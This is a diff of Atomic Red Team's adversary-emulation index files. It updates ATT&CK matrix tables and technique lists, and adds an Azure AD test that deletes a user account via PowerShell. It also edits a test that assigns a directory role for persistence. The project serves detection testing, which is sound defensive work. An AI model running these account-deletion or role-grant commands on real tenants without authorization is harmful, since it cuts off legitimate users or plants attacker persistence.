   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1364,6 +1375,7 @@
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
   - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
   - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
@@ -1489,6 +1501,7 @@
   - Atomic Test #3: Process Discovery - Get-Process [windows]
   - Atomic Test #4: Process Discovery - get-wmiObject [windows]
   - Atomic Test #5: Process Discovery - wmic process [windows]
+  - Atomic Test #6: Discover Specific Process - tasklist [windows]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
   - Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
@@ -1507,7 +1520,8 @@
   - Atomic Test #2: Discover System Language with chcp [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
-  - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
+  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
+  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
@@ -1736,8 +1750,8 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Matrices/linux-matrix.md

@@ -17,7 +17,7 @@
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Browser Extensions](../../T1176/T1176.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -39,7 +39,7 @@
 |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -112,7 +112,7 @@
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Build Image on Host](../../T1612/T1612.md) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -24,7 +24,7 @@
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/azure-ad-index.yaml

@@ -7862,6 +7862,7 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - root
+      identifier: T1612
     atomic_tests: []
   T1055.002:
     technique:
@@ -27610,6 +27611,7 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
+      identifier: T1559
     atomic_tests: []
   T1204.003:
     technique:
@@ -36711,7 +36713,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36736,7 +36739,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -36748,7 +36751,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -61367,7 +61370,74 @@ impact:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1531
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure AD - Delete user via Azure AD PowerShell
+      auto_generated_guid: 4f577511-dc1c-4045-bcb8-75d2457f01f4
+      description: Deletes a user in Azure AD. Adversaries may interrupt availability
+        of system and network resources by inhibiting access to accounts utilized
+        by legitimate users. Accounts may be deleted, locked, or manipulated (excluding
+        changed credentials) to remove access to accounts.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        userprincipalname:
+          description: User principal name (UPN) for the Azure user being deleted
+          type: String
+          default: atomicredteam@yourdomain.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\nRemove-AzureADUser
+          -ObjectId $userprincipalname      "
+        cleanup_command: N/A
+        name: powershell
